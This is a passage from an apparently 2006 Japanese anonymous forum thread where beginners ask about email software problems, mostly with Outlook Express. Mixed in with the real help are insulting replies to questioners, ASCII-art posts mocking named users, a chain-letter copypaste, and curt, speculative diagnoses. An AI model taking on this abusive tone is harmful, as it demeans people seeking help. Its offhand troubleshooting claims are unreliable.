ポート : 110, セキュリティ (SSL): なし, サーバー エラー : 0x800CCC90, エラー番号 : 0x800CCC90」

91 :ひよこ名無しさん:2006/03/03(金) 22:09:50 ID:???
>>90
>どなたかご享受いただけますでしょうか?

からかってご享受していいのかいw

92 :ひよこ名無しさん:2006/03/03(金) 22:26:12 ID:hCLcjpuN
>>91
オケ

93 :ひよこ名無しさん:2006/03/04(土) 08:14:23 ID:???
>>90
サーバーメンテじゃないの?

94 :ひよこ名無しさん:2006/03/05(日) 18:36:52 ID:8LAhAMxt
質問です。どうぞ宜しくお願いします。
OS:ウィンドウズXP
SW:Microsoft Outlook使用です。

3日前に自分の携帯からパソコンのアドレスに写メールを
送信したのですが、それを受信してから同じメールが何通も届くように
なってしまいました。プロバイダからのメルマガなども何度も何通も
届くのであっという間に数百件になってしまい、困っています。
過去にこういう例も、前に写メールを受信した時も
特に変わった事はありませんでした。
アドレスを変えたり、設定をいじったりもしていません。
何かウイルスに感染したのでしょうか?



95 :ひよこ名無しさん:2006/03/05(日) 19:11:29 ID:???
>>94
君がメーラーの設定を何もいじっていないと言い張るなら
プロバイダに問い合わせてみな

96 :94:2006/03/05(日) 19:34:53 ID:8LAhAMxt
>>95
サイトの宣伝メール・メルマガや携帯メールなども同じく何度も届くのですが
プロバイダに問い合わせれば良いのでしょうか?
今からしてみますね。ありがとうございました。

97 :outlook:2006/03/05(日) 22:32:01 ID:vIzaIbMw
outlookですが、新しいPCに変えて
困ったことが1つあります。
助けてください。

旧PCよりエキスポートしたメール送信日時が
新PCにインポートした時点で日付が
おかしくなってしまいました。
2月7日から2月30日までに送信したメールの日にちが
エキスポートしたのをみたら3月7日から3月30日
になってました。多分旧PCの調子がおかしかったので
そのような事になったのだと思います。
新PCの送信日時を変えることはできませんか?
できれば方法教えてください。
お願いします。

98 :ひよこ名無しさん:2006/03/05(日) 22:36:30 ID:???
>>97
自演すんなウジ虫

99 :ひよこ名無しさん:2006/03/05(日) 23:37:14 ID:???
>>97
わからん


100 :outlook:2006/03/05(日) 23:45:13 ID:vIzaIbMw
ウジムシって・・・ひどいわ(笑)
ほんとに困ってるのに(;-;)

今日そのことに気づかず
新PC第一号のメールを送信したので
送信済み欄をみたら送ったはずのメールタイトルが
見当たりません。はじめ送信できなかったのか
と思ってあせりまくりましたが、日付が違っている事
に気づきました。ずーーと下のほうをみると
3月5日の日時のところにちょこんと
今日の送信メールが記録されてました。
何がなんだかわからなくなって
こちらにきました。


101 :ひよこ名無しさん:2006/03/05(日) 23:47:44 ID:???
>>100
今日は3/5だよ?
どこが間違っている?

102 :outlook:2006/03/05(日) 23:48:56 ID:vIzaIbMw
日付の変更方法教えてください。
このままだと何かで不都合がでるような気がします。

そういえば、1年前に人から来たメールの日付が
2036年付けでした。そのメールを削除するまで
何ケ月も先頭に陣取っていました。
まあ、これはあまり困らず毎日笑ってすごせましたが

はーー、今回はこまりました。


103 :outlook=97:2006/03/05(日) 23:49:59 ID:vIzaIbMw
>101
すみません。
>>97ご参照ください。

104 :ひよこ名無しさん:2006/03/05(日) 23:53:08 ID:???
>>103
どうせOutlookのバグだろ
対処法はない
メーラー変えろ

105 :outlook=97:2006/03/05(日) 23:54:28 ID:vIzaIbMw
今私のOUTLOOKの送信済みメールの先頭の
日付は2006年3月30日です。
しかもそこから2006年3月8日まで40通ほどあります。
これから、送信済みを確認するのに
とっても面倒なんです。

106 : ◆RevGiOKgRo :2006/03/05(日) 23:57:06 ID:???
>>105
時間の上で右栗>時間の設定

107 :ひよこ名無しさん:2006/03/06(月) 01:29:53 ID:???
>>106
自演すんなウジ虫

108 :ひよこ名無しさん:2006/03/06(月) 02:23:16 ID:???
自演狂w

109 :ひよこ名無しさん:2006/03/06(月) 02:25:16 ID:???
>107
自演狂

110 :ひよこ名無しさん:2006/03/07(火) 00:37:27 ID:5CKB0xWL
メールが数日前から受信できなくなりました。
送信はできるのですが。
どうしたら直るのか教えて下さい。お願いします。
受信拒否とかはしてません。

111 :ひよこ名無しさん:2006/03/07(火) 00:38:16 ID:???
>>110
HijackThisで検査。

112 :ひよこ名無しさん:2006/03/07(火) 00:39:15 ID:???
>>110
糞スレ上げて自演すんなヴォケ

113 :110:2006/03/07(火) 01:11:44 ID:???
なんか携帯に送って返信するとユーザーが見つかりませんとか返ってくるんですけど
もう訳分かんないし面倒だからいいです。
>>111さんありがとうございました。

114 :ひよこ名無しさん:2006/03/17(金) 20:54:23 ID:BqmRneJD
From: Mail Delivery Subsystem
Subject: Returned mail: see transcript for details
という添付ファイルつきのメールが届いたのですが、
ウイルスなのか本当にReturned mailなのかを、セキュリティソフトを使わずに判別する方法はありますか?
ある人にメールを送信した二分後に届きました。
Outlook Express 6、プロバイダはniftyです。
相手の方のアドレスはplalaです。

115 :ひよこ名無しさん:2006/03/17(金) 20:57:29 ID:???
>>114
ない

116 :ひよこ名無しさん:2006/03/19(日) 13:29:44 ID:2DefEzSP
OS:XP HomeEdition
使用ソフト:Outlook Express 6

ずっとメインユーザーだけで使っていましたが、
この前ユーザーの切り替え機能を使ってもう一つユーザーを作成したんです。
そのユーザーのパスワードを忘れてしまいました。
メインユーザーの方のパスワードは分かるので、
このパスワードが分からなくなってしまった方のユーザーは消してしまっても差し支えないので
(使用しているメールアドレスも両方同じなので)
パスワードが分からなくなってしまったほうのユーザーを削除したいのですが
削除するためにはパスワードが必要みたいでorz
どうしたら削除できますか。

117 :ひよこ名無しさん:2006/03/22(水) 08:58:31 ID:???


118 :ひよこ名無しさん:2006/04/02(日) 17:30:31 ID:rBD+ESPb
OS 98SE
使用ソフト OutlookExpress6

新PCのOS XP
新PCの使用ソフト OutlookExpress6

初めてパソコンを買い換えました。
アドレス帳などはケーブルを利用して転送が出来たんですが
メールの本文を新しいPCに移す方法を知りたいです。
今までのメールが全て見れなくなるのは惜しいので
いい方法があれば教えてください。

ちなみに、古いPCではDVDなどへの書きこみができません。
しいて言えばフロッピー…でも新PCでフロッピーが使えないので
あまり役に立たないですよねorz

よろしくお願いします。


119 :ひよこ名無しさん:2006/04/02(日) 20:27:09 ID:KrpVkLr6
>>118
ケーブルでつないで、共有フォルダをつくり古いPCのmailのファイルを転送すれば良いです。

120 :ひよこ名無しさん:2006/04/02(日) 21:17:25 ID:uGWsPn0k
OS:98SE
使用ソフト:Outlook Express 6

メインユーザー以外にも別のユーザーをつくっていたのですが、
そのユーザーのログインパスワードを忘れてしまったのですが、
それにログインできる方法はあるのでしょうか?

そのユーザーのメールフォルダの画像だけでも取り出したいのですが、、、、
お願いします。

121 :118:2006/04/02(日) 21:57:47 ID:sEBuPo0O
118です。>>119さんレスありがとうございます。

しかしながらレスを見る前に、自分なりに勉強して、
ttp://support.microsoft.com/default.aspx?scid=kb%3bja%3b880553
これを参考にDBXファイルとかいうものを作ってそれをまとめたフォルダを
ケーブルで新PCに転送しました。
旧PCに入っていたメール関連のものはすべて削除してしまいました。
あとはttp://support.microsoft.com/kb/880643/JA/
こんな感じで復元すればいいと思っていたんですが…
新PCのメールソフトはOE6ではなく、Outlook2003でしたorz
自分のアホさに腹が立ちます。

このDBXファイルを使用して、なんとかOutlook2003に
メール本文を取り込むことはできないでしょうか?
アドレス帳などは最悪の場合手打ちで取り込むつもりですが
本文だけは何とかして取り戻したいです。
アドバイスもらえるとうれしいです。
よろしくお願いします。





122 :118:2006/04/02(日) 22:18:11 ID:sEBuPo0O
なんどもすいません。自己解決しました。
お世話になりました。

123 :ひよこ名無しさん:2006/04/03(月) 06:47:03 ID:4k+vsiif
OS:WinXPホームエディション
メールソフト:アウトルックエクスプレス

本日起動したところ、2006年のメールのみ消失
復旧ソフトなどを使えば復旧できるのでしょうか?

124 :ひよこ名無しさん:2006/04/03(月) 06:51:08 ID:EX+lvA94
>>123
OS名もわかるなら初心者じゃないだろ
ここはウィンドウズとマックの区別も付かないよな初心者が聞くとこと
どっか行けや

125 :ひよこ名無しさん:2006/04/03(月) 07:10:08 ID:EX+lvA94
>>123
しゃーねー、アニメーターの俺が答えてやるか
>>124のことは謝罪するぜ

まず、Outlook Expressの「ツール」をクリックして「オプション」を選択して
そしたら「メンテナンス」タブを開いて、「保存フォルダ」ボタンをクリック
出て来た画面のOEのデータファイルの保存場所が書かれているから
コピーして、ファイル名を指定して実行にコピペして開きます

そこに受信フォルダ(1)とかがあれば復旧できる可能性あり
やってみて


126 :ひよこ名無しさん:2006/04/03(月) 17:24:06 ID:AiwBNFxq
XPで新しくメールアドレスを登録したいんですがどうすればいいですか?

127 :ひよこ名無しさん:2006/04/03(月) 19:58:49 ID:???
>>126
ったく、しょうがないなぁ

Ctrl+Shift+C


128 :ひよこ名無しさん:2006/04/04(火) 08:36:55 ID:KezU8g+w
アウトルックエクスプレス6を使ってます。
受信トレイにあるメールを一気に全部消したいのですが、
何か方法はありますか?

129 :ひよこ名無しさん:2006/04/04(火) 20:52:36 ID:???
>>128
全部選択してdel

130 :128:2006/04/05(水) 00:11:19 ID:???
>>129
どうもありがとうございます。できました。
昨日は100通ほど右クリックして削除のDを押すということ繰り返してました (⌒∇⌒;

131 :ひよこ名無しさん:2006/04/12(水) 22:12:37 ID:AJd747t/
とあるところからメールが届いたのですが、

Date: Wed, 12 Apr 2006 20:47:14 +1000
From: support@nuspace.info
Subject: Re: CGI=?ISO-2022-JP?B?GyRCQF9DViVHJSMlbCUvJUglaiRIGyhC?=SSI=?ISO-2022-JP?B?GyRCJEskRCQkJEYbKEI=?=
To: xxx@xxx
Cc: xxx@xxx
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Apple Mail (2.749.3)

5rC054Sh54Cs5qeYDQoNCuOBhOOBpOOCguOBiuS4luipseOBq+OBquOBo+OBpuOBiuOCiuOBvuOB
meOAguODi+ODpeODvOOCueODmuODvOOCueODuyANCuODjeODg+ODiOOBruODrOODs+OCv+ODq+OC
teODvOODkOODvOOBq+mWouOBl+OBpuOBiuWVj+OBhOWQiOOCj+OBm+mggiANCuOBjeOAgeiqoOOB
q+OBguOCiuOBjOOBqOOBhuOBlOOBluOBhOOBvuOBmeOAgg0KDQrjgYrllY/jgYTlkIjjgo/jgZvm
lofjga7kuIDpg6jjgYzmtojjgYjjgabjgZfjgb7jgaPjgZ/jgojjgYbjgafjgZkgDQrjgYzjgIHl

といった風に文字化けしてしまいました。
変換するにはどうすれば良いでしょうか?

OSはWindows2000で、メーラーはpochyを使っています。

132 :ひよこ名無しさん:2006/04/16(日) 10:23:05 ID:LrFG64fr
携帯からパソコンにメール来るとアドレス登録しておいても名前が表示されないんだけど
送信者名でるメーラーなんかありますか?おしえて


133 :ひよこ名無しさん:2006/04/16(日) 10:32:22 ID:???
>>132
EUDORA

134 :ひよこ名無しさん:2006/04/19(水) 14:16:02 ID:ASCIqCr5
らくらくメールBOX(バージョンは2000年に配信されたものだと思います)
というソフトを使ってるのですが
メールの送信はできるのですが受信は
1/317通のメール受信中ですとなるのですが
うまく受信されずサーバーから切断と表示され
うまく受信できません。

ヘルプで受信サーバーの確認とかったのですが
設定は変えてないのでそれは問題ないと思うのですが。

これは富士通に聞いたほうがいいのでしょうか?
それともメールがサーバーに317通もたまってる?ので
自分はケーブルを使ってるのでケーブル会社に
問い合わせた方がいいのでしょうか?
使ってるOSは98です。
ここで解決できる問題なら解決の仕方を教えてください。
お願いします。

135 :ひよこ名無しさん:2006/04/19(水) 14:20:54 ID:???
>134
アンチウイルスソフトとの相性とかもあり得る
知人のMeで2000年版ポストペットで同様の症状が出たときは
アンチウイルスソフトを一端アンインストールして拾ってた

136 :ひよこ名無しさん:2006/04/19(水) 14:37:31 ID:???
レス、ありがとうございます。
アンチウイルスソフトの相性ですか。
でもアンチウイルスソフトはまったくいれてません。
逆にいれてないからこうなってしまったのかも?

とりあえずメールだけするなら新しく他のメールソフトをいれれば
メールだけはできるようになれるのでしょうか。


137 :134:2006/04/20(木) 19:41:58 ID:???
アウトルックエクスプレスでサーバーにあるメールを
全部受信したら、なくなったので
ラクラクメールボックが正常に使えるようになりました。

138 :ひよこ名無しさん:2006/04/24(月) 09:53:43 ID:???
質問します。 ウィンドウズXPです。
MSNメールEXplorerを開こうとしたのですがサインイン出来なくなってしまいました。

「サインインを完了できません、サービスが一時的に使用できなくなっているか、インターネットの接続に問題があります。」
と出ますがインターネットは繋がっていますし一時的にと言われても常に入れませんしどうすればよろしいでしょうか?

139 :マララー( ・∀・) ◆uAUwMARaRA :2006/04/26(水) 23:21:17 ID:??? ?
spamって食品会社の名前からきてるのね。
今日はじめて知ったよ

140 :ひよこ名無しさん:2006/04/27(木) 23:51:25 ID:UHMeQWkQ
自分の表示名どうしてますか?
本名を入れるのは抵抗があります。
相手によって変えるものでしょうか?

141 :ひよこ名無しさん:2006/04/27(木) 23:56:17 ID:???
>>140
うっせえハゲ。

142 :ひよこ名無しさん:2006/04/27(木) 23:59:45 ID:UHMeQWkQ
>>141
変わった表示名ですね…今はそうゆうのが受けるのでしょうか

143 :ひよこ名無しさん:2006/05/02(火) 18:52:01 ID:cpgXISZQ
一番軽いメーラーは何ですか?Win98です・・・

144 :経済学部の学生 ◆2H3Xipoq6Y :2006/05/02(火) 23:46:44 ID:???
>>143
ShurikenPro4R2がオススメ。

145 :ひよこ名無しさん :2006/05/04(木) 13:37:16 ID:aJSoRTzQ
OS:Windows XP
SW:OutlookExpress6

メールの送受信が出来なくなりました。何故か受信は出来ます。
プロバイダーに問い合わせて、サーバーのチェック→異常無しでした。

使用ウィルスソフト会社に電話をするよに言われたのですが、電話が繋がりません。
何方か解決方法知ってたら教えて下さい。よろしくです。
  

146 :145:2006/05/04(木) 18:06:12 ID:4s6mdWXF
訂正 メールの送受信が出来なくなりました
        ↑
        送信

147 :ひよこ名無しさん:2006/05/04(木) 22:45:43 ID:5ySCfBTk
OS:WIN2000
SW:OutlookExpress6

送受信時のパスワード入力を解除したいのですが
やり方がわかりません。
教えてください。

148 :ひよこ名無しさん:2006/05/04(木) 22:49:30 ID:???
愛新覚羅 ◆WjkbiI..A2 の自作自演
http://pc.2ch.net/test/read.cgi/win/1021112227/511-514

511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。


512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。


513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512
自作自演失敗?


514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?

149 :ひよこ名無しさん:2006/05/04(木) 23:23:55 ID:OgftAfRJ
Meを使ってるんですが、OEでメールを携帯に送ろうとすると
サイズの大きなメールは送信ボタンを押すとそのまま応答しなくなってしまいます。
再起動をかけても症状は変わりません。
OEのバージョンは5で、5KB以上のものを送ろうとするとそうなるようです。
どうかよろしくお願いします。

150 :ひよこ名無しさん:2006/05/13(土) 19:37:18 ID:KQz2l5dP
ちょっと質問です。
ヤフーメールで画像を添付して送るとき
受け取った相手がメールを開いた時点で
画像が表示するようにするにはどうしたらいいでしょうか?
お願いします。


151 :ひよこ名無しさん:2006/05/13(土) 19:37:57 ID:???
>>150
いじくるつくーる使え

152 :ひよこ名無しさん:2006/05/13(土) 19:40:04 ID:???
愛新覚羅 ◆WjkbiI..A2 の自作自演
http://pc.2ch.net/test/read.cgi/pcqa/1021802095/837-846

837 名前:ひよこ名無しさん 投稿日:02/05/20 08:35 ID:GarmVKYa
あまりに馬鹿馬鹿しい質問ですいません。
Windows Media Plyaer と KbMedia Player  がパソコンの中にあるのですが、MP3ファイルをクリックすると
Windows Media Plyaer で再生してしまうのですが、ダブルクリックした際に後者で再生するようにはどうしたらいいんでしょうか?

838 名前:ひよこ名無しさん 投稿日:02/05/20 08:36 ID:???
>>837
またきたのか?
Windowsの入門書以上の書籍買って関連付けに関して理解を深めろ。

839 名前:Aya ◆U.S.S.po 投稿日:02/05/20 08:36 ID:GarmVKYa
>>837
1.mp3のファイルをクリック
2.「アプリケーションから開く」を選択
3.プログラムの選択
4.「これらのファイルを開くときは、
  いつもこのアプリケーションを使う」にチェック
5.OK

840 名前:ひよこ名無しさん 投稿日:02/05/20 08:37 ID:???
>>839
自作自演するときはIDを消しましょうね(ワラ

153 :ひよこ名無しさん:2006/05/13(土) 19:41:04 ID:KQz2l5dP
ツール使わなくても出来たらしいんだけど
やっぱ無理ですかね?

154 :ひよこ名無しさん:2006/05/19(金) 20:13:48 ID:???
保守age

155 :ひよこ名無しさん:2006/05/19(金) 21:06:55 ID:???
583 名前:農学部の学生 ◆2H3Xipoq6Y 投稿日:2006/05/19(金) 20:45:31 ID:???
「startx」コマンドでXwindowシステムが立ち上がるんですけど、Xwindowの終了の仕方がわからないんですけど・・・。
再起動するしかないんですかね?

583 名前:農学部の学生 ◆2H3Xipoq6Y 投稿日:2006/05/19(金) 20:45:31 ID:???
「startx」コマンドでXwindowシステムが立ち上がるんですけど、Xwindowの終了の仕方がわからないんですけど・・・。
再起動するしかないんですかね?

583 名前:農学部の学生 ◆2H3Xipoq6Y 投稿日:2006/05/19(金) 20:45:31 ID:???
「startx」コマンドでXwindowシステムが立ち上がるんですけど、Xwindowの終了の仕方がわからないんですけど・・・。
再起動するしかないんですかね?

583 名前:農学部の学生 ◆2H3Xipoq6Y 投稿日:2006/05/19(金) 20:45:31 ID:???
「startx」コマンドでXwindowシステムが立ち上がるんですけど、Xwindowの終了の仕方がわからないんですけど・・・。
再起動するしかないんですかね?

583 名前:農学部の学生 ◆2H3Xipoq6Y 投稿日:2006/05/19(金) 20:45:31 ID:???
「startx」コマンドでXwindowシステムが立ち上がるんですけど、Xwindowの終了の仕方がわからないんですけど・・・。
再起動するしかないんですかね?

583 名前:農学部の学生 ◆2H3Xipoq6Y 投稿日:2006/05/19(金) 20:45:31 ID:???
「startx」コマンドでXwindowシステムが立ち上がるんですけど、Xwindowの終了の仕方がわからないんですけど・・・。
再起動するしかないんですかね?

156 :ひよこ名無しさん:2006/06/02(金) 10:04:29 ID:P2X3Q5N1
>>132とは別人ですが 同じことで悩んでます
Outlook Expressではアドレス帳の登録名を送信者に表示させることは不可能
と解釈していいんですよね?
上記の機能を持った無料のメーラーはありますでしょうか?
ご教授いただけたら幸いです

157 :経済学部の学生 ◆2H3Xipoq6Y :2006/06/02(金) 13:16:39 ID:???
>>156
サンダーバードとか?

158 :経済学部の学生 ◆2H3Xipoq6Y :2006/06/02(金) 13:32:23 ID:???
>>156
↓コレね。
http://www.mozilla-japan.org/products/thunderbird/

個人的にはShurikenPro4がオススメだけど。

159 :156:2006/06/02(金) 13:49:47 ID:???
>>157-158
ありがとうございます!
PTAの集会の召集が目的なので お金かけてまではやりたくなかったのです
今ブラウザはFirefoxで Thunderbirdがその機能使えるのか気になってました
本当にありがとうございました!


160 :159=156:2006/06/02(金) 14:14:33 ID:???
喜び勇んでFirefoxスレに行ってみたんですが thunderbirdも現時点では
>>132を可能にする機能拡張がないようです…orz

161 :のぶ:2006/06/02(金) 14:57:41 ID:/fn9YuFD
    _,,,,,,,,
     , - ' ゙    `` ‐ 、_,,,,,
   ,r'          /=ミ
  /           彡ll',''´
. /             彡lll
 !-- .、    ,、、、、,,,   彡lノ
 l,,,,,__ /   ___     'r''゙ヽ
. |`゙'' ./   `'゙'''"    .〉,l |
 |.   ,'           //
. ',. ,'           , r'
.  ゙, ゙'ー ‐`      l  |
   ゙、''゙ ,,、二''‐    ノ  l、
''''''''7'ヽ  '''    /   /`〉`゙T''''''''''
  l  ` 、,,,,、- ' "    / /.|  |
.  |  |  .l i       / ./ |  |
  |  |  | l      / ./ .|  |
. |  |   | l     / /  |  |
 |  |   | ',   / /  l  .l
【ゴールデンレス】
このレスを見た人はコピペでもいいので
10分以内に3つのスレへ貼り付けてください。
そうすれば14日後好きな人から告白されるわ宝くじは当たるわ
出世しまくるわ体の悪い所全部治るわでえらい事です

162 :ひよこ名無しさん:2006/06/03(土) 13:06:25 ID:68lWGlRX
XP、MSNオフィス2007(ベータ)、Outlook Express6

40代後半のおじさんですが、ファイルを添付する時、窓が小さくて当該ファイルを見つけるのに苦労しています。
なにか妙案はないでしょうか。フォルダー別にファイルを整理していますが、それでも辛いです。

163 :ひよこ名無しさん:2006/06/03(土) 13:40:12 ID:???
>>162
デスクトップなどに新しくフォルダを作り、添付するファイルをそちらに
コピー。OEの添付画面でこのフォルダをターゲットにする。

164 :162:2006/06/03(土) 16:09:45 ID:68lWGlRX
163殿
ありがとうございました。
実に単純明快、コロンブスの卵でした。
ありがたや、ありがたや。

165 :ひよこ名無しさん:2006/06/08(木) 14:18:41 ID:/fMcM0uT
airH''でプロバイダはpurinを使っていますが、メールアドレスの取得方法が
わかりません。 
どなたかわかるかたおられましたら教えてください。

166 :ひよこ名無しさん:2006/06/08(木) 14:23:29 ID:???
>>165
なぜプロバイダに聞かない

167 :ひよこ名無しさん:2006/06/08(木) 14:24:18 ID:???
     / ̄ ̄ ̄ ̄ ̄ ̄ ̄\ 
    | ○。         |
    ノノ)            从
   ( i从〓〓      〓〓.从
   .从-=・=-      -=・=-从
  从从.        l       从)
  (从.l∴      ∨     ∴从人)
 (人人|∴ ヽ  .ー===-' ./.∴..从人)  <無職元祖ぶる殿 ◆U/gDqFZzsY蚤
 (人人|∴∴!    ̄   !∴∴l从人)   
 (人人|∴∴!.       !∴∴l从人)   
 (人人|∴∴!.       !∴∴l从人)
..(人人人_人____人_.人人人)
〔ノ二二,___       __,二二ヽ〕
 |:::::::::::::::::::::::::ヽ゜   ゜/:::::::::::::::::::::::::/
 〉::::::::: :::::::::::::〉__∩__〈:::::::::::::: ::::::::〈 
 |:::::::::::::::::::::::/\ ̄/ヽ:::::::::::::::::::::/
〔:::::::::::::::::::::/  ノ ~ヽ  ヽ::::::::::::::::::|
ヽ:::::::::::::::::/ /:::::::::::: \ ):::::::::::::::::::ゝ
ノ:::::::::::::::::::| |_〜─ー= - | |〜〜〜/




168 :ひよこ名無しさん:2006/06/18(日) 20:01:54 ID:???
保守

169 :ひよこ名無しさん:2006/06/30(金) 01:43:40 ID:6x0KiAQy
プライベート用としてPCのアドレスを取得したいのですが、頻繁に使うわけでないのであれば、ヤフーメールのようなフリーメールでこと足りるのですか?それとも、親しい友人にフリーメールのアドレスを教えるのは失礼に当たってしまうのでしょうか?
プロバイダーのアドレス?や有料アドレスのように、しっかりしたものを用意するべきですか?
「超」初心者な質問で申し訳ありません。

170 :ひよこ名無しさん:2006/06/30(金) 01:48:46 ID:???
>>169
友人ならフリーメールでも良いんじゃない?
仕事ならちょっと、あれだけど。

171 :ひよこ名無しさん:2006/06/30(金) 10:22:09 ID:???
>>170
ありがとうございます。
まずはフリーメールのアドレスを作ってみます。

172 :ひよこ名無しさん:2006/07/12(水) 23:20:32 ID:1617pGP3
質問です。
PC本体に貯まってる削除後のメールの消し方ってありますか?

173 :ひよこ名無しさん:2006/07/13(木) 23:48:16 ID:???
質問
今までフリーメールしか使ってなかったのですが
フリーじゃないPCメールを使いたいのですが使えませんorz
Outlookは入ってるみたいですが…

174 :ひよこ名無しさん:2006/07/13(木) 23:52:21 ID:blG+HHEu
まちがえてメル欄いれてしまいました

質問です
今までフリーメールしか使ってなかったのですが
フリーじゃないPCメールを使いたいのですが使えませんorz
Outlookは入ってるみたいですが…



175 :ひよこ名無しさん:2006/07/13(木) 23:55:48 ID:???
>>174
どぞ
http://support.biglobe.ne.jp/settei/mailer/win-oe/winoe55_plural.html

176 :ひよこ名無しさん:2006/07/14(金) 01:10:55 ID:oUEhYDPo
OE6でメールを送受信しようとしたとき、パスワード認証画面が出たのですが、正規のパスワードを入力してもエラーが出てしまいました。
アカウント名とパスワードの再入力、アカウント設定の削除いずれの方法もやってみましたがうまくいきません。
何かいい方法はないでしょうか?OSはWindows XPです。
よろしくお願いいたします。

177 :ひよこ名無しさん:2006/07/14(金) 01:12:55 ID:???
エラーメッセージを一字一句正確に書かないと
有効な回答は貰えませんよ〜

178 :ひよこ名無しさん:2006/07/14(金) 01:19:18 ID:oUEhYDPo
メール サーバーにログオンできませんでした。 パスワードが拒否されました。
と出ます。

179 :ひよこ名無しさん:2006/07/14(金) 01:25:43 ID:???
>>178
とりあえずここの対処法を試してみてください。
http://www.web-sanin.co.jp/mac3w/manu/error/mail.htm

180 :ひよこ名無しさん:2006/07/16(日) 22:43:23 ID:CIbq1GHM
『送信者の電子メール アドレスが拒否されたため、メッセージを送信できませんでした。』
というメッセージが出ます。
私のアドレスも相手のアドレスも間違ってないようなのですが
どうすればいいのでしょうか?

181 :ひよこ名無しさん:2006/07/16(日) 22:44:07 ID:???
>>180
おかんに相談してみ。

182 :ひよこ名無しさん:2006/07/16(日) 22:51:48 ID:???
>>180
相手が受け取り拒否設定してるんだろ

183 :180:2006/07/16(日) 22:54:42 ID:CIbq1GHM
your address is not for this domain
私のアドレスどうなってるんでしょう?

184 :ひよこ名無しさん:2006/07/16(日) 22:57:09 ID:???
>>183
ウィルス感染してるな

185 :ひよこ名無しさん:2006/07/16(日) 22:58:24 ID:???
>>183
これ試せ

アンチドートを語ろう♪ MAP02
http://pc8.2ch.net/test/read.cgi/sec/1098644237/

186 :180:2006/07/17(月) 22:46:28 ID:JnDGhgrT
トロイの木馬なら出てきましたが・・・
これが原因なんでしょうか?
つ「Trojan-Proxy.Win32.Xorpix.v」

187 :ひよこ名無しさん:2006/07/17(月) 22:47:14 ID:???
>>186
気にスンナ、デブ。

188 :ひよこ名無しさん:2006/07/19(水) 12:05:03 ID:pVwSxHSf
メールが送信できなかった
これどういう意味?


This is the Postfix program at host isvw01.

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

For further assistance, please send mail to <postmaster>

If you do so, please include this problem report. You can
delete your own text from the attached returned message.

The Postfix program


189 :ひよこ名無しさん:2006/07/19(水) 14:03:43 ID:kAaoId3y
「削除済みフォルダ」のアイテムを完全に削除したんですが
それを復元ってできますか?
outlook express6です。

190 :ひよこ名無しさん:2006/07/19(水) 14:40:54 ID:???



        やる事2ちゃんとテレビだけ無職元祖ぶる殿 ◆U/gDqFZzsY
              ↓

                     ハァハァ   
            / ̄ ̄ ̄ ̄\  ハァ ハァ     
 ̄||      ハァ (  , 、      )  ハァ
  ||         (-◎-◎ー  ;;;;;) __,,.-───ヽ__     )))
   ||      ハァ(  (_ _)    6)-"           ̄ ̄\   ))
   ||     ハァ (  ε  ∴  |    ⌒─-,,__/      )
    ||      ハァゝ_____/  ヽ、 _     ̄ヽ   ̄ ̄─⌒丶  )))
 ̄ ̄○二二二|, -─⌒ ̄ ヽ   , -─⌒ ̄ ̄      ノ         \



191 :ひよこ名無しさん:2006/07/26(水) 20:46:53 ID:OSj74Xhw
アウトルックエクスプレスを使用しています。
最近立ち上げて、画面がでる前に 「 Unable to CreateSpam Folder 」という
小さな四角が出てきます。OKを押すと普通に立ち上がります。
なにか変になったのでしょうか?メールの送受信はできているのでしょうか?
どうすればいいんでしょうか。


192 :ひよこ名無しさん:2006/07/26(水) 23:33:41 ID:???
>>189
出来ません

>>191
ウイルスセキュリティの説明書でスパムフォルダに関する事柄を読んでください

193 :ひよこ名無しさん:2006/07/27(木) 02:50:52 ID:2KQ8kGsw
http://kaoxkao.web.fc2.com/

194 :ひよこ名無しさん:2006/07/31(月) 02:08:24 ID:G3u9LqDD
XPホームエディション、ノートンを使用しています。
今日急にアウトルックエキスプレスでメールの送受信が出来なくなりました。
立ち上げるとユーザー名とパスワードの入力するログオン画面が出てきます。
それには既に両方とも入力済みでOKをクリックしても何度も出てきます。
試しに全て消して再度入力しなおしても出てきます。
昨日までは全く問題なく使用できていたのですが
なにが原因か分かりません。

195 :ひよこ名無しさん:2006/07/31(月) 16:52:19 ID:PaKxrXqW
WinXP+OE6とMac+Eudoraの両方でメールをしています。
双方とも、受信時にメッセージのコピーをサーバーに残す設定にしてありますが、
たまにMacで受信したものがWinで受信できないことがあります。
今回、確認の為にnPOPでサーバーにあるメール一覧を取得しましたが、
目的のメールは確かにサーバー上にあります。
特に変わったメールではなく、送信元、内容ともに普段から定期的に受信している
ものです。
原因は何が考えられますか?また、OEで強制的に受信する方法はあります
でしょうか?

196 :ひよこ名無しさん:2006/07/31(月) 20:09:11 ID:NHJYQQLu
WinXPで、Outlook Expressを使ってます。

フリーズ後、Outlook Expressのメールが消失
その後、受信とインポートができなくなりました。

詳しい解決方法がわからず困ってます。
googleで調べましたが事故解決することができませんでした。
症状の改善方法など教えてくださると助かります。

197 :ひよこ名無しさん:2006/07/31(月) 20:15:21 ID:???



        やる事2ちゃんとテレビだけ無職愛新覚羅 ◆WjkbiI..A2蚤
              ↓

                     ハァハァ   
            / ̄ ̄ ̄ ̄\  ハァ ハァ     
 ̄||      ハァ (  , 、      )  ハァ
  ||         (-◎-◎ー  ;;;;;) __,,.-───ヽ__     )))
   ||      ハァ(  (_ _)    6)-"           ̄ ̄\   ))
   ||     ハァ (  ε  ∴  |    ⌒─-,,__/      )
    ||      ハァゝ_____/  ヽ、 _     ̄ヽ   ̄ ̄─⌒丶  )))
 ̄ ̄○二二二|, -─⌒ ̄ ヽ   , -─⌒ ̄ ̄      ノ         \





198 :ひよこ名無しさん:2006/07/31(月) 20:50:52 ID:rkDh/IDa
希望としては開いたときに音楽が 流れるような
メールを送りたいのですが、テキスト形式でMP3
ファイルを添付して送ったときに受け取り側が
Outlook Expressだったら、メールを開いたら
